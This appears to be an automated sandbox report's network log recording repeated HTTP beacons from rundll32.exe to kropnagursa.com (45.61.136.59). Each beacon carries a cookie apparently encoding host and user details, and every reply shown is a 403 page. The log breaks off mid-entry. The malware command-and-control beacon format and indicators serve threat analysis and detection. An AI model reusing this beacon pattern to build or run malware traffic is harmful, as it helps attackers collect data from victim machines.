                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:42 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            17192.168.2.44971345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:09.315639973 CET2129OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:09.482002974 CET2130INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:09 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            170192.168.2.44986645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:42.599406004 CET2326OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:42.764347076 CET2326INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:42 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            171192.168.2.44986745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:43.087955952 CET2327OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:43.256227970 CET2327INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:43 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            172192.168.2.44986845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:44.211935997 CET2328OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:44.376600981 CET2328INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:44 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            173192.168.2.44986945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:44.721355915 CET2329OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:44.886111021 CET2330INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:44 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            174192.168.2.44987045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:45.208250999 CET2331OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:45.373048067 CET2331INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:45 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            175192.168.2.44987145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:45.706581116 CET2332OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:45.871153116 CET2332INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:45 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            176192.168.2.44987245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:46.183193922 CET2333OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:46.348031998 CET2334INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:46 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            177192.168.2.44987345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:46.970412016 CET2334OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:47.138396025 CET2335INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:47 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            178192.168.2.44987445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:47.461429119 CET2336OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:47.628559113 CET2336INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:47 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            179192.168.2.44987545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:48.165270090 CET2337OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:48.333515882 CET2337INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:48 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            18192.168.2.44971445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:10.118194103 CET2130OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:10.286283016 CET2131INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:10 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            180192.168.2.44987645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:48.657325983 CET2338OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:48.822557926 CET2339INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:48 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            181192.168.2.44987745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:49.119533062 CET2339OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:49.284384012 CET2340INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:49 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            182192.168.2.44987845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:49.598032951 CET2341OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:49.762921095 CET2341INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:49 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            183192.168.2.44987945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
